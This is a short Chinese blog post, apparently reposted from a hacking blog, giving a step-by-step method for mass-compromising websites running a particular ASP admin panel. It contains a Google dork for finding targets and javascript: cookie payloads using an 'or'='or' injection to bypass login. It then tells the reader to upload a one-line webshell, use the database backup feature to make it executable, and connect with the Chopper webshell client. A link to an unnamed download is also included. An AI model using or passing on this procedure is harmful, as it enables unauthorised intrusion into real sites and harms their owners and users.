利用关键字后台批量拿shell

google:关键字:inurl:szwyadmin/login.asp

打开任意一个搜索结果,打开后台登录界面后,在地址栏中全部替换成下面代码:

javascript:alert(document.cookie=”adminuser=”+escape(“‘or’=’or'”));javascript:alert(document.cookie=”adminpass=”+escape(“‘or’=’or'”));javascript:alert(document.cookie=”admindj=”+escape(“1”));

如果以上的代码不能使用请下载:http://pan.baidu.com/s/11PuhB

然后关闭此页面
再次打开后台登录界面
在地址栏中把login.asp改为admin_index.asp
就直接进入后台了。

进入后台后在添加新闻的地方上传一句话后,复制链接地址:

szwyadmin

然后点击备份如下图:

20131022124743

然后点击备份数据,备份成功后得到地址:

20131022130809

拿起菜刀链接:

20131022125456

 

原创文章转载请注明:转载自 七行者博客

本文固定链接: http://www.qxzxp.com/3731.html